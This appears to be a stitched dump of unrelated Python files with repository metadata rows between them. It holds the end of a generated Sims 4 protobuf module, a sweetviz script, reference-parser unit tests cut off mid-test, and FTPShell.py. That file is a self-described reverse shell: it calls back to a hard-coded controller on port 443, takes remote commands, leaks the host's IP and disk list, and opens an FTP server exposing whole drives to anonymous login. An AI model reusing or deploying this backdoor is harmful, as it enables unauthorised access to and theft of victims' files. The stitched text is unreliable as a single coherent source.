cpp_type=9,
label=3,
has_default_value=False,
default_value=[],
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='loser_ids',
full_name='EA.Sims4.Network.SocialEvaluationResultsMessage.loser_ids',
index=1,
number=2,
type=9,
cpp_type=9,
label=3,
has_default_value=False,
default_value=[],
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='digest',
full_name='EA.Sims4.Network.SocialEvaluationResultsMessage.digest',
index=2,
number=3,
type=12,
cpp_type=9,
label=1,
has_default_value=False,
default_value=b'',
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None)],
extensions=[],
nested_types=[],
enum_types=[],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=6455,
serialized_end=6542)
_SOCIALCGDIGESTMESSAGE = descriptor.Descriptor(name='SocialCGDigestMessage',
full_name='EA.Sims4.Network.SocialCGDigestMessage',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
descriptor.FieldDescriptor(name='challenge',
full_name='EA.Sims4.Network.SocialCGDigestMessage.challenge',
index=0,
number=1,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=((b'').decode('utf-8')),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None),
descriptor.FieldDescriptor(name='candidates',
full_name='EA.Sims4.Network.SocialCGDigestMessage.candidates',
index=1,
number=2,
type=11,
cpp_type=10,
label=3,
has_default_value=False,
default_value=[],
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
options=None)],
extensions=[],
nested_types=[],
enum_types=[],
options=None,
is_extendable=False,
extension_ranges=[],
serialized_start=6544,
serialized_end=6660)
_SOCIALGENERICRESPONSE.fields_by_name['msg_type'].enum_type = Consts_pb2._SOCIALOPTYPES
_SOCIALPLAYERINFOLIST_PLAYERINFO.fields_by_name['presence'].enum_type = Consts_pb2._ONLINEPRESENCESTATUS
_SOCIALPLAYERINFOLIST_PLAYERINFO.containing_type = _SOCIALPLAYERINFOLIST
_SOCIALPLAYERINFOLIST.fields_by_name['players'].message_type = _SOCIALPLAYERINFOLIST_PLAYERINFO
_SOCIALSEARCHMSG.fields_by_name['search_results'].message_type = Localization_pb2._LOCALIZEDSTRINGTOKEN
_SOCIALCASSANDRATEST.fields_by_name['opcode'].enum_type = Consts_pb2._CASSANDRATESTCODE
_SOCIALEXCHANGEMESSAGE.fields_by_name['envelope'].message_type = Exchange_pb2._EXCHANGESOCIALENVELOPE
_SOCIALFEEDITEMMESSAGE.fields_by_name['feed_type'].enum_type = _SOCIALFEEDITEMTYPE
_SOCIALFEEDITEMMESSAGE.fields_by_name['metadata'].message_type = Exchange_pb2._TRAYMETADATA
_SOCIALFEEDITEMMESSAGE.fields_by_name['followers_blob'].message_type = _SOCIALFOLLOWERSMESSAGE
_SOCIALGETWALLCOMMENTSMESSAGE.fields_by_name['messages'].message_type = _SOCIALWALLCOMMENTMESSAGE
_SOCIALPOSTWALLCOMMENTMESSAGE.fields_by_name['message'].message_type = _SOCIALWALLCOMMENTMESSAGE
_SOCIALREQUESTFEEDWALLMESSAGE.fields_by_name['messages'].message_type = _SOCIALFEEDITEMMESSAGE
_SOCIALREQUESTFEEDWALLMESSAGE.fields_by_name['unserialized_messages'].message_type = _SOCIALFEEDITEMUNSERIALIZEDMESSAGE
_SOCIALGETPLAYERINFOLISTMESSAGE_PLAYERINFO.containing_type = _SOCIALGETPLAYERINFOLISTMESSAGE
_SOCIALGETPLAYERINFOLISTMESSAGE.fields_by_name['player_info_list'].message_type = _SOCIALGETPLAYERINFOLISTMESSAGE_PLAYERINFO
_SOCIALCONTROLMESSAGE.fields_by_name['opcode'].enum_type = Consts_pb2._SOCIALOPTYPES
_SOCIALCONTROLMESSAGE.fields_by_name['subop'].enum_type = Consts_pb2._SOCIALOPTYPES
_SOCIALCONTROLMESSAGE.fields_by_name['getwallcommentsmsg'].message_type = _SOCIALGETWALLCOMMENTSMESSAGE
_SOCIALCONTROLMESSAGE.fields_by_name['postwallcommentmsg'].message_type = _SOCIALPOSTWALLCOMMENTMESSAGE
_SOCIALCONTROLMESSAGE.fields_by_name['deletewallcommentmsg'].message_type = _SOCIALDELETEWALLCOMMENTMESSAGE
_SOCIALCONTROLMESSAGE.fields_by_name['friendmsg'].message_type = _SOCIALFRIENDMSG
_SOCIALCONTROLMESSAGE.fields_by_name['genericresponse'].message_type = _SOCIALGENERICRESPONSE
_SOCIALCONTROLMESSAGE.fields_by_name['playerinfo'].message_type = _SOCIALPLAYERINFOLIST
_SOCIALCONTROLMESSAGE.fields_by_name['feedsubmsg'].message_type = Exchange_pb2._SOCIALFEEDSUBMESSAGE
_SOCIALCONTROLMESSAGE.fields_by_name['searchresultmsg'].message_type = _SOCIALSEARCHMSG
_SOCIALCONTROLMESSAGE.fields_by_name['inviteresponsemsg'].message_type = _SOCIALINVITERESPONSEMESSAGE
_SOCIALCONTROLMESSAGE.fields_by_name['originerror'].message_type = _ORIGINERRORMESSAGE
_SOCIALCONTROLMESSAGE.fields_by_name['socialcassandratest'].message_type = _SOCIALCASSANDRATEST
_SOCIALCONTROLMESSAGE.fields_by_name['socialfriendlistrequestmsg'].message_type = _SOCIALFRIENDLISTREQUESTMESSAGE
_SOCIALCONTROLMESSAGE.fields_by_name['socialrequestnucleusidfrompersona'].message_type = _SOCIALREQUESTNUCLEUSIDFROMPERSONA
_SOCIALCONTROLMESSAGE.fields_by_name['socialnucleusidfrompersonaresponse'].message_type = _SOCIALNUCLEUSIDFROMPERSONARESPONSE
_SOCIALCONTROLMESSAGE.fields_by_name['socialexchangemessage'].message_type = _SOCIALEXCHANGEMESSAGE
_SOCIALCONTROLMESSAGE.fields_by_name['socialrequestfeedwallmessage'].message_type = _SOCIALREQUESTFEEDWALLMESSAGE
_SOCIALCONTROLMESSAGE.fields_by_name['stat_tickers'].message_type = Exchange_pb2._EXCHANGESTATTICKERMESSAGE
_SOCIALCONTROLMESSAGE.fields_by_name['comment_petition_msg'].message_type = _SOCIALCOMMENTPETITIONMESSAGE
_SOCIALCONTROLMESSAGE.fields_by_name['feedremovalmsg'].message_type = _SOCIALFEEDREMOVALMESSAGE
_SOCIALCONTROLMESSAGE.fields_by_name['bio_petition_msg'].message_type = _SOCIALBIOPETITIONMESSAGE
_SOCIALCONTROLMESSAGE.fields_by_name['fb_event_msg'].message_type = _SOCIALFACEBOOKEVENTMESSAGE
_SOCIALCONTROLMESSAGE.fields_by_name['requestfollowers_msg'].message_type = _SOCIALREQUESTFOLLOWERSMESSAGE
_SOCIALCONTROLMESSAGE.fields_by_name['responsefollowers_msg'].message_type = Exchange_pb2._SOCIALRESPONSEFOLLOWERSMESSAGE
_SOCIALCONTROLMESSAGE.fields_by_name['requestignorelist_msg'].message_type = _SOCIALREQUESTIGNORELISTMESSAGE
_SOCIALCONTROLMESSAGE.fields_by_name['response_player_info_list_msg'].message_type = _SOCIALGETPLAYERINFOLISTMESSAGE
_SOCIALCONTROLMESSAGE.fields_by_name['player_identification_list_msg'].message_type = Exchange_pb2._SERVERPLAYERIDENTIFICATIONLISTMESSAGE
_SOCIALCONTROLMESSAGE.fields_by_name['candidate_msg'].message_type = _SOCIALCANDIDATESMESSAGE
_SOCIALCONTROLMESSAGE.fields_by_name['evaluation_results_msg'].message_type = _SOCIALEVALUATIONRESULTSMESSAGE
_SOCIALCONTROLMESSAGE.fields_by_name['cg_update_msg'].message_type = Exchange_pb2._SOCIALCGUPDATEMESSAGE
_SOCIALCONTROLQUEUEBROADCASTMESSAGE.fields_by_name['control'].message_type = _SOCIALCONTROLMESSAGE
_SOCIALCANDIDATESMESSAGE.fields_by_name['candidates'].message_type = _SOCIALCANDIDATESTATISTICSUBMESSAGE
_SOCIALCGDIGESTMESSAGE.fields_by_name['candidates'].message_type = _SOCIALCANDIDATESTATISTICSUBMESSAGE
DESCRIPTOR.message_types_by_name['SocialFriendMsg'] = _SOCIALFRIENDMSG
DESCRIPTOR.message_types_by_name['SocialPersonaResponseMsg'] = _SOCIALPERSONARESPONSEMSG
DESCRIPTOR.message_types_by_name['SocialGenericResponse'] = _SOCIALGENERICRESPONSE
DESCRIPTOR.message_types_by_name['SocialPlayerInfoList'] = _SOCIALPLAYERINFOLIST
DESCRIPTOR.message_types_by_name['SocialSearchMsg'] = _SOCIALSEARCHMSG
DESCRIPTOR.message_types_by_name['OriginErrorMessage'] = _ORIGINERRORMESSAGE
DESCRIPTOR.message_types_by_name['SocialInviteResponseMessage'] = _SOCIALINVITERESPONSEMESSAGE
DESCRIPTOR.message_types_by_name['SocialCassandraTest'] = _SOCIALCASSANDRATEST
DESCRIPTOR.message_types_by_name['SocialFriendListRequestMessage'] = _SOCIALFRIENDLISTREQUESTMESSAGE
DESCRIPTOR.message_types_by_name['SocialRequestNucleusIdFromPersona'] = _SOCIALREQUESTNUCLEUSIDFROMPERSONA
DESCRIPTOR.message_types_by_name['SocialNucleusIdFromPersonaResponse'] = _SOCIALNUCLEUSIDFROMPERSONARESPONSE
DESCRIPTOR.message_types_by_name['SocialExchangeMessage'] = _SOCIALEXCHANGEMESSAGE
DESCRIPTOR.message_types_by_name['SocialFollowersMessage'] = _SOCIALFOLLOWERSMESSAGE
DESCRIPTOR.message_types_by_name['SocialFeedItemMessage'] = _SOCIALFEEDITEMMESSAGE
DESCRIPTOR.message_types_by_name['SocialFeedItemUnserializedMessage'] = _SOCIALFEEDITEMUNSERIALIZEDMESSAGE
DESCRIPTOR.message_types_by_name['SocialWallCommentMessage'] = _SOCIALWALLCOMMENTMESSAGE
DESCRIPTOR.message_types_by_name['SocialGetWallCommentsMessage'] = _SOCIALGETWALLCOMMENTSMESSAGE
DESCRIPTOR.message_types_by_name['SocialPostWallCommentMessage'] = _SOCIALPOSTWALLCOMMENTMESSAGE
DESCRIPTOR.message_types_by_name['SocialDeleteWallCommentMessage'] = _SOCIALDELETEWALLCOMMENTMESSAGE
DESCRIPTOR.message_types_by_name['SocialRequestFeedWallMessage'] = _SOCIALREQUESTFEEDWALLMESSAGE
DESCRIPTOR.message_types_by_name['SocialRequestFollowersMessage'] = _SOCIALREQUESTFOLLOWERSMESSAGE
DESCRIPTOR.message_types_by_name['SocialRequestIgnoreListMessage'] = _SOCIALREQUESTIGNORELISTMESSAGE
DESCRIPTOR.message_types_by_name['SocialGetPlayerInfoListMessage'] = _SOCIALGETPLAYERINFOLISTMESSAGE
DESCRIPTOR.message_types_by_name['SocialCommentPetitionMessage'] = _SOCIALCOMMENTPETITIONMESSAGE
DESCRIPTOR.message_types_by_name['SocialBioPetitionMessage'] = _SOCIALBIOPETITIONMESSAGE
DESCRIPTOR.message_types_by_name['SocialFeedRemovalMessage'] = _SOCIALFEEDREMOVALMESSAGE
DESCRIPTOR.message_types_by_name['SocialControlMessage'] = _SOCIALCONTROLMESSAGE
DESCRIPTOR.message_types_by_name['SocialInvalidateMsg'] = _SOCIALINVALIDATEMSG
DESCRIPTOR.message_types_by_name['SocialControlQueueBroadcastMessage'] = _SOCIALCONTROLQUEUEBROADCASTMESSAGE
DESCRIPTOR.message_types_by_name['LifeEventMessage'] = _LIFEEVENTMESSAGE
DESCRIPTOR.message_types_by_name['SocialFacebookEventMessage'] = _SOCIALFACEBOOKEVENTMESSAGE
DESCRIPTOR.message_types_by_name['SocialCandidateStatisticSubmessage'] = _SOCIALCANDIDATESTATISTICSUBMESSAGE
DESCRIPTOR.message_types_by_name['SocialCandidatesMessage'] = _SOCIALCANDIDATESMESSAGE
DESCRIPTOR.message_types_by_name['SocialEvaluationResultsMessage'] = _SOCIALEVALUATIONRESULTSMESSAGE
DESCRIPTOR.message_types_by_name['SocialCGDigestMessage'] = _SOCIALCGDIGESTMESSAGE
class SocialFriendMsg(message.Message, metaclass=reflection.GeneratedProtocolMessageType):
DESCRIPTOR = _SOCIALFRIENDMSG
class SocialPersonaResponseMsg(message.Message, metaclass=reflection.GeneratedProtocolMessageType):
DESCRIPTOR = _SOCIALPERSONARESPONSEMSG
class SocialGenericResponse(message.Message, metaclass=reflection.GeneratedProtocolMessageType):
DESCRIPTOR = _SOCIALGENERICRESPONSE
class SocialPlayerInfoList(message.Message, metaclass=reflection.GeneratedProtocolMessageType):
class PlayerInfo(message.Message, metaclass=reflection.GeneratedProtocolMessageType):
DESCRIPTOR = _SOCIALPLAYERINFOLIST_PLAYERINFO
DESCRIPTOR = _SOCIALPLAYERINFOLIST
class SocialSearchMsg(message.Message, metaclass=reflection.GeneratedProtocolMessageType):
DESCRIPTOR = _SOCIALSEARCHMSG
class OriginErrorMessage(message.Message, metaclass=reflection.GeneratedProtocolMessageType):
DESCRIPTOR = _ORIGINERRORMESSAGE
class SocialInviteResponseMessage(message.Message, metaclass=reflection.GeneratedProtocolMessageType):
DESCRIPTOR = _SOCIALINVITERESPONSEMESSAGE
class SocialCassandraTest(message.Message, metaclass=reflection.GeneratedProtocolMessageType):
DESCRIPTOR = _SOCIALCASSANDRATEST
class SocialFriendListRequestMessage(message.Message, metaclass=reflection.GeneratedProtocolMessageType):
DESCRIPTOR = _SOCIALFRIENDLISTREQUESTMESSAGE
class SocialRequestNucleusIdFromPersona(message.Message, metaclass=reflection.GeneratedProtocolMessageType):
DESCRIPTOR = _SOCIALREQUESTNUCLEUSIDFROMPERSONA
class SocialNucleusIdFromPersonaResponse(message.Message, metaclass=reflection.GeneratedProtocolMessageType):
DESCRIPTOR = _SOCIALNUCLEUSIDFROMPERSONARESPONSE
class SocialExchangeMessage(message.Message, metaclass=reflection.GeneratedProtocolMessageType):
DESCRIPTOR = _SOCIALEXCHANGEMESSAGE
class SocialFollowersMessage(message.Message, metaclass=reflection.GeneratedProtocolMessageType):
DESCRIPTOR = _SOCIALFOLLOWERSMESSAGE
class SocialFeedItemMessage(message.Message, metaclass=reflection.GeneratedProtocolMessageType):
DESCRIPTOR = _SOCIALFEEDITEMMESSAGE
class SocialFeedItemUnserializedMessage(message.Message, metaclass=reflection.GeneratedProtocolMessageType):
DESCRIPTOR = _SOCIALFEEDITEMUNSERIALIZEDMESSAGE
class SocialWallCommentMessage(message.Message, metaclass=reflection.GeneratedProtocolMessageType):
DESCRIPTOR = _SOCIALWALLCOMMENTMESSAGE
class SocialGetWallCommentsMessage(message.Message, metaclass=reflection.GeneratedProtocolMessageType):
DESCRIPTOR = _SOCIALGETWALLCOMMENTSMESSAGE
class SocialPostWallCommentMessage(message.Message, metaclass=reflection.GeneratedProtocolMessageType):
DESCRIPTOR = _SOCIALPOSTWALLCOMMENTMESSAGE
class SocialDeleteWallCommentMessage(message.Message, metaclass=reflection.GeneratedProtocolMessageType):
DESCRIPTOR = _SOCIALDELETEWALLCOMMENTMESSAGE
class SocialRequestFeedWallMessage(message.Message, metaclass=reflection.GeneratedProtocolMessageType):
DESCRIPTOR = _SOCIALREQUESTFEEDWALLMESSAGE
class SocialRequestFollowersMessage(message.Message, metaclass=reflection.GeneratedProtocolMessageType):
DESCRIPTOR = _SOCIALREQUESTFOLLOWERSMESSAGE
class SocialRequestIgnoreListMessage(message.Message, metaclass=reflection.GeneratedProtocolMessageType):
DESCRIPTOR = _SOCIALREQUESTIGNORELISTMESSAGE
class SocialGetPlayerInfoListMessage(message.Message, metaclass=reflection.GeneratedProtocolMessageType):
class PlayerInfo(message.Message, metaclass=reflection.GeneratedProtocolMessageType):
DESCRIPTOR = _SOCIALGETPLAYERINFOLISTMESSAGE_PLAYERINFO
DESCRIPTOR = _SOCIALGETPLAYERINFOLISTMESSAGE
class SocialCommentPetitionMessage(message.Message, metaclass=reflection.GeneratedProtocolMessageType):
DESCRIPTOR = _SOCIALCOMMENTPETITIONMESSAGE
class SocialBioPetitionMessage(message.Message, metaclass=reflection.GeneratedProtocolMessageType):
DESCRIPTOR = _SOCIALBIOPETITIONMESSAGE
class SocialFeedRemovalMessage(message.Message, metaclass=reflection.GeneratedProtocolMessageType):
DESCRIPTOR = _SOCIALFEEDREMOVALMESSAGE
class SocialControlMessage(message.Message, metaclass=reflection.GeneratedProtocolMessageType):
DESCRIPTOR = _SOCIALCONTROLMESSAGE
class SocialInvalidateMsg(message.Message, metaclass=reflection.GeneratedProtocolMessageType):
DESCRIPTOR = _SOCIALINVALIDATEMSG
class SocialControlQueueBroadcastMessage(message.Message, metaclass=reflection.GeneratedProtocolMessageType):
DESCRIPTOR = _SOCIALCONTROLQUEUEBROADCASTMESSAGE
class LifeEventMessage(message.Message, metaclass=reflection.GeneratedProtocolMessageType):
DESCRIPTOR = _LIFEEVENTMESSAGE
class SocialFacebookEventMessage(message.Message, metaclass=reflection.GeneratedProtocolMessageType):
DESCRIPTOR = _SOCIALFACEBOOKEVENTMESSAGE
class SocialCandidateStatisticSubmessage(message.Message, metaclass=reflection.GeneratedProtocolMessageType):
DESCRIPTOR = _SOCIALCANDIDATESTATISTICSUBMESSAGE
class SocialCandidatesMessage(message.Message, metaclass=reflection.GeneratedProtocolMessageType):
DESCRIPTOR = _SOCIALCANDIDATESMESSAGE
class SocialEvaluationResultsMessage(message.Message, metaclass=reflection.GeneratedProtocolMessageType):
DESCRIPTOR = _SOCIALEVALUATIONRESULTSMESSAGE
class SocialCGDigestMessage(message.Message, metaclass=reflection.GeneratedProtocolMessageType):
DESCRIPTOR = _SOCIALCGDIGESTMESSAGE | 31.050625 | 10,693 | 0.763723 | 5,350 | 0.053839 | 0 | 0 | 0 | 0 | 0 | 0 | 27,127 | 0.272987 |
5f9ec6c74b57542c9787a229e40967ba3e06098c | 56 | py | Python | NumpyUtility/__init__.py | PaulKGrimes/NumpyUtility | 35607725d07952deca10d7342043db7e77756278 | [
"MIT"
] | null | null | null | NumpyUtility/__init__.py | PaulKGrimes/NumpyUtility | 35607725d07952deca10d7342043db7e77756278 | [
"MIT"
] | null | null | null | NumpyUtility/__init__.py | PaulKGrimes/NumpyUtility | 35607725d07952deca10d7342043db7e77756278 | [
"MIT"
] | null | null | null | __all__ = ["NumpyUtility"]
from .NumpyUtility import *
| 14 | 27 | 0.732143 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 14 | 0.25 |
5f9f9ecefb3439db4ca570e4a61b0846cf1331d6 | 188 | py | Python | 09-Data-Analysis/Sweetviz/ReprotViz.py | NguyenQuangBinh803/Python-Heritage | 7da72b2926cefc4903086a1cab7de3a64764d648 | [
"MIT"
] | 1 | 2021-01-10T12:06:26.000Z | 2021-01-10T12:06:26.000Z | 09-Data-Analysis/Sweetviz/ReprotViz.py | NguyenQuangBinh803/Python-Heritage | 7da72b2926cefc4903086a1cab7de3a64764d648 | [
"MIT"
] | null | null | null | 09-Data-Analysis/Sweetviz/ReprotViz.py | NguyenQuangBinh803/Python-Heritage | 7da72b2926cefc4903086a1cab7de3a64764d648 | [
"MIT"
] | null | null | null | import sweetviz
import pandas as pd
if __name__ == '__main__':
df = pd.read_csv("BankChurners_clean.csv")
report = sweetviz.analyze(df, "Attrition_Flag")
report.show_html()
| 20.888889 | 51 | 0.707447 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 50 | 0.265957 |
5fa0436f9f5d626cf4b365a484376d1f5343ee15 | 5,046 | py | Python | FTPShell/FTPShell.py | dsogo/H4CKING | 58aaaabc25995dbff9aa4985e8308a963772b87e | [
"MIT"
] | 17 | 2020-10-07T01:37:32.000Z | 2021-12-11T21:23:25.000Z | FTPShell/FTPShell.py | Al0nnso/H4CKING | 58aaaabc25995dbff9aa4985e8308a963772b87e | [
"MIT"
] | null | null | null | FTPShell/FTPShell.py | Al0nnso/H4CKING | 58aaaabc25995dbff9aa4985e8308a963772b87e | [
"MIT"
] | 8 | 2020-09-22T03:14:51.000Z | 2022-03-07T16:03:24.000Z | from pyftpdlib.authorizers import DummyAuthorizer
from pyftpdlib.handlers import FTPHandler
from multiprocessing import Process
from pyftpdlib import servers
from time import sleep
from requests import get
import socket
import psutil
import win32api
# Al0nnso - 2019
# FTP Reverse Shell
# NOT TESTED WITH EXTERN NETWORK
try:
ip = get('https://api.ipify.org').text
except:
ip='ERROR'
pass
ftp=None
server = None
disk = "\\"
address = ("0.0.0.0", 21)
user = None
host = '192.168.15.5'# YOUR IP OR HOST
port = 443
def ftp_main(server, address, disk, user, s, ip):
print('FTP STARTING...')
try:
authorizer = DummyAuthorizer()
try:
try:
s.send('FTP starting...: {}'.format(ip).encode())
except:
pass
print('TRYING...')
if disk.isalpha():
disk = '{}:\\'.format(disk)
if user == None:
authorizer.add_anonymous(disk)
elif user == '/user':
authorizer.add_user('user', '404', disk, perm="elradfmwMT")
else:
authorizer.add_user(user, user, disk, perm="elradfmwMT")
except:
authorizer.add_anonymous("\\")
handler = FTPHandler
handler.authorizer = authorizer
address = ("0.0.0.0", 21)
server = servers.FTPServer(address, FTPHandler)
try:
s.send('[+] FTP server started on ftp://{}:21'.format(ip).encode())
except:
pass
server.serve_forever()
except Exception as e:
sleep(10)
print('reconecting...')
try:
s.send('reconecting...'.encode())
except:
pass
print(e)
ftp_main()
def socketConn(ftp):
try:
global address, disk, user, host, port, server, ip
# server=None
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.send('[+] Connected'.encode())
while True:
Fdata = s.recv(3000)
Fdata = Fdata.decode()
if len(Fdata) > 0 or Fdata == " ":
print(Fdata)
data = str(Fdata).split(" ")
if 'exit' in data[0].lower():
try:
ftp.terminate()
s.send('ftp closed'.encode())
except:
s.send('WTF exit?'.encode())
elif data[0].lower()=='ip' or data[0].lower()=='inf':
s.send(str(ip).encode())
elif data[0].lower()=='disk' or data[0].lower()=='d':#LIST DISK
try:
disks=None
disks=psutil.disk_partitions()
s.send(str(disks).replace(',','\n').encode())
except:
s.send('FAIL DISK'.encode())
elif data[0].lower()=='vol' or data[0].lower()=='v':#LIST VOL OF DISK
try:
drives = win32api.GetLogicalDriveStrings()
drives = drives.split('\000')[:-1]
s.send((str(drives).replace("\'","")).encode())
except Exception as e:
s.send('FAIL VOL: {}'.format(e).encode())
elif (data[0].lower() == 'start'):
mode = data[0].lower()
print(len(data))
for i in range(len(data)):
print(str(i))
if mode == 'start' and '-D' in data[i].upper():
if data[i + 1].isalpha():
disk = data[i + 1].upper()
s.send('DISK: {}'.format(disk).encode())
if mode == 'start' and '-U' in data[i].upper():
user = data[i + 1]
s.send('USER: {}'.format(user).encode())
if mode == 'start' and '-A' in data[i].upper():
addr = data[i + 1]
print('addr: {}'.format(addr))
try:
address = (addr, 21)
s.send('address: {}'.format(address).encode())
except:
s.send('fail to set addr...'.encode())
s.send(' '.encode())
if ftp!=None:
ftp.terminate()
s.send('ftp closed'.encode())
ftp = Process(target=ftp_main,args=(server, address, disk, user, s, ip))
ftp.start()
else:
s.send(' '.encode())
else:
s.send(' '.encode())
except Exception as e:
print('Socket reconection...')
print(e)
s = None
sleep(2)
socketConn(ftp)
if __name__ == '__main__':
socketConn(ftp)
| 35.535211 | 92 | 0.441538 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 641 | 0.127031 |
5fa103b113b3be7f53cb7ec2e64ba88c2cf38693 | 8,321 | py | Python | tests/test_io.py | wellcometrust/deep_reference_parser | b58e4616f4de9bfe18ab41e90f696f80ab876245 | [
"MIT"
] | 13 | 2020-02-19T02:09:00.000Z | 2021-12-16T23:15:58.000Z | tests/test_io.py | wellcometrust/deep_reference_parser | b58e4616f4de9bfe18ab41e90f696f80ab876245 | [
"MIT"
] | 33 | 2020-02-12T11:21:51.000Z | 2022-02-10T00:48:17.000Z | tests/test_io.py | wellcometrust/deep_reference_parser | b58e4616f4de9bfe18ab41e90f696f80ab876245 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# coding: utf-8
import os
import pytest
from deep_reference_parser.io.io import (
read_jsonl,
write_jsonl,
load_tsv,
write_tsv,
_split_list_by_linebreaks,
_unpack,
)
from deep_reference_parser.reference_utils import yield_token_label_pairs
from .common import TEST_JSONL, TEST_TSV_TRAIN, TEST_TSV_PREDICT, TEST_LOAD_TSV
@pytest.fixture(scope="module")
def tmpdir(tmpdir_factory):
return tmpdir_factory.mktemp("data")
def test_unpack():
before = [
(
("token0", "token1", "token2", "token3"),
("label0", "label1", "label2", "label3")
),
(
("token0", "token1", "token2"),
("label0", "label1", "label2")
),
]
expected = [
(
("token0", "token1", "token2", "token3"),
("token0", "token1", "token2"),
),
(
("label0", "label1", "label2", "label3"),
("label0", "label1", "label2")
),
]
actual = _unpack(before)
assert expected == actual
def test_write_tsv(tmpdir):
expected = (
(
("the", "focus", "in", "Daloa", ",", "Côte", "d’Ivoire]."),
("Bulletin", "de", "la", "Société", "de", "Pathologie"),
("Exotique", "et"),
),
(
("i-r", "i-r", "i-r", "i-r", "i-r", "i-r", "i-r"),
("i-r", "i-r", "i-r", "i-r", "i-r", "i-r"),
("i-r", "i-r"),
),
)
token_label_tuples = list(yield_token_label_pairs(expected[0], expected[1]))
PATH = os.path.join(tmpdir, "test_tsv.tsv")
write_tsv(token_label_tuples, PATH)
actual = load_tsv(os.path.join(PATH))
assert expected == actual
def test_load_tsv_train():
"""
Text of TEST_TSV_TRAIN:
```
the i-r
focus i-r
in i-r
Daloa i-r
, i-r
Côte i-r
d’Ivoire]. i-r
Bulletin i-r
de i-r
la i-r
Société i-r
de i-r
Pathologie i-r
Exotique i-r
et i-r
```
"""
expected = (
(
("the", "focus", "in", "Daloa", ",", "Côte", "d’Ivoire]."),
("Bulletin", "de", "la", "Société", "de", "Pathologie"),
("Exotique", "et"),
),
(
("i-r", "i-r", "i-r", "i-r", "i-r", "i-r", "i-r"),
("i-r", "i-r", "i-r", "i-r", "i-r", "i-r"),
("i-r", "i-r"),
),
)
actual = load_tsv(TEST_TSV_TRAIN)
assert len(actual[0][0]) == len(expected[0][0])
assert len(actual[0][1]) == len(expected[0][1])
assert len(actual[0][2]) == len(expected[0][2])
assert len(actual[1][0]) == len(expected[1][0])
assert len(actual[1][1]) == len(expected[1][1])
assert len(actual[1][2]) == len(expected[1][2])
assert actual == expected
def test_load_tsv_predict():
"""
Text of TEST_TSV_PREDICT:
```
the
focus
in
Daloa
,
Côte
d’Ivoire].
Bulletin
de
la
Société
de
Pathologie
Exotique
et
```
"""
expected = (
(
("the", "focus", "in", "Daloa", ",", "Côte", "d’Ivoire]."),
("Bulletin", "de", "la", "Société", "de", "Pathologie"),
("Exotique", "et"),
),
)
actual = load_tsv(TEST_TSV_PREDICT)
assert actual == expected
def test_load_tsv_train_multiple_labels():
"""
Text of TEST_TSV_TRAIN:
```
the i-r a
focus i-r a
in i-r a
Daloa i-r a
, i-r a
Côte i-r a
d’Ivoire]. i-r a
Bulletin i-r a
de i-r a
la i-r a
Société i-r a
de i-r a
Pathologie i-r a
Exotique i-r a
et i-r a
token
```
"""
expected = (
(
("the", "focus", "in", "Daloa", ",", "Côte", "d’Ivoire]."),
("Bulletin", "de", "la", "Société", "de", "Pathologie"),
("Exotique", "et"),
),
(
("i-r", "i-r", "i-r", "i-r", "i-r", "i-r", "i-r"),
("i-r", "i-r", "i-r", "i-r", "i-r", "i-r"),
("i-r", "i-r"),
),
(
("a", "a", "a", "a", "a", "a", "a"),
("a", "a", "a", "a", "a", "a"),
("a", "a"),
),
)
actual = load_tsv(TEST_LOAD_TSV)
assert actual == expected
def test_yield_toke_label_pairs():
tokens = [
[],
["the", "focus", "in", "Daloa", ",", "Côte", "d’Ivoire]."],
["Bulletin", "de", "la", "Société", "de", "Pathologie"],
["Exotique", "et"],
]
labels = [
[],
["i-r", "i-r", "i-r", "i-r", "i-r", "i-r", "i-r"],
["i-r", "i-r", "i-r", "i-r", "i-r", "i-r"],
["i-r", "i-r"],
]
expected = [
(None, None),
("the", "i-r"),
("focus", "i-r"),
("in", "i-r"),
("Daloa", "i-r"),
(",", "i-r"),
("Côte", "i-r"),
("d’Ivoire].", "i-r"),
(None, None),
("Bulletin", "i-r"),
("de", "i-r"),
("la", "i-r"),
("Société", "i-r"),
("de", "i-r"),
("Pathologie", "i-r"),
(None, None),
("Exotique", "i-r"),
("et", "i-r"),
(None, None),
]
actual = list(yield_token_label_pairs(tokens, labels))
assert expected == actual
def test_read_jsonl():
expected = [
{
"text": "a b c\n a b c",
"tokens": [
{"text": "a", "start": 0, "end": 1, "id": 0},
{"text": "b", "start": 2, "end": 3, "id": 1},
{"text": "c", "start": 4, "end": 5, "id": 2},
{"text": "\n ", "start": 5, "end": 7, "id": 3},
{"text": "a", "start": 7, "end": 8, "id": 4},
{"text": "b", "start": 9, "end": 10, "id": 5},
{"text": "c", "start": 11, "end": 12, "id": 6},
],
"spans": [
{"start": 2, "end": 3, "token_start": 1, "token_end": 2, "label": "b"},
{"start": 4, "end": 5, "token_start": 2, "token_end": 3, "label": "i"},
{"start": 7, "end": 8, "token_start": 4, "token_end": 5, "label": "i"},
{"start": 9, "end": 10, "token_start": 5, "token_end": 6, "label": "e"},
],
}
]
expected = expected * 3
actual = read_jsonl(TEST_JSONL)
assert expected == actual
def test_write_jsonl(tmpdir):
expected = [
{
"text": "a b c\n a b c",
"tokens": [
{"text": "a", "start": 0, "end": 1, "id": 0},
{"text": "b", "start": 2, "end": 3, "id": 1},
{"text": "c", "start": 4, "end": 5, "id": 2},
{"text": "\n ", "start": 5, "end": 7, "id": 3},
{"text": "a", "start": 7, "end": 8, "id": 4},
{"text": "b", "start": 9, "end": 10, "id": 5},
{"text": "c", "start": 11, "end": 12, "id": 6},
],
"spans": [
{"start": 2, "end": 3, "token_start": 1, "token_end": 2, "label": "b"},
{"start": 4, "end": 5, "token_start": 2, "token_end": 3, "label": "i"},
{"start": 7, "end": 8, "token_start": 4, "token_end": 5, "label": "i"},
